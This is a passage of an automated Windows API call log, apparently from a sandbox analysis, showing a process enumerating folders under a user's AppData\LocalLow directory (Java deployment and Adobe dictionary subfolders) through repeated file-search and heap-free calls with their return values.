PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.235] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.235] PathFindFileNameW (pszPath="") returned="" [0173.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46080 | out: hHeap=0xcd0000) returned 1 [0173.235] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.235] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 1 [0173.235] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0173.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4d020 | out: hHeap=0xcd0000) returned 1 [0173.236] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.236] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45e88 | out: hHeap=0xcd0000) returned 1 [0173.236] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35c4658 | out: hHeap=0xcd0000) returned 1 [0173.236] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609fa8 | out: hHeap=0xcd0000) returned 1 [0173.236] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0173.236] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a390 | out: hHeap=0xcd0000) returned 1 [0173.236] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a458 | out: hHeap=0xcd0000) returned 1 [0173.236] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45fd8 | out: hHeap=0xcd0000) returned 1 [0173.236] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4d0b8 | out: hHeap=0xcd0000) returned 1 [0173.236] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0173.236] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.236] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\") returned="all\\" [0173.236] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.236] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.236] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.236] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.236] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.237] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.237] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.237] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.237] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.237] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.237] PathFindFileNameW (pszPath="") returned="" [0173.237] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.238] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.238] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.238] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.238] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.239] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.239] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.239] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.239] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\") returned="brt\\" [0173.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.239] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.239] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.240] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.240] PathFindFileNameW (pszPath="") returned="" [0173.240] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.241] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.241] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.241] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.241] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.241] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\") returned="brz\\" [0173.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.242] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.242] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.242] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.242] PathFindFileNameW (pszPath="") returned="" [0173.242] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.249] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.249] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.249] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.249] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.250] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.250] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\") returned="dan\\" [0173.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.251] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.251] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.251] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.251] PathFindFileNameW (pszPath="") returned="" [0173.251] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.251] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.251] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.251] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.252] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.252] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.252] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.252] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\") returned="dut\\" [0173.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.252] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.252] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.253] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.253] PathFindFileNameW (pszPath="") returned="" [0173.253] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.253] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.253] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.253] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.253] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.254] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.254] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.254] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\") returned="eng\\" [0173.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.255] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.255] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.255] PathFindFileNameW (pszPath="") returned="" [0173.255] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, 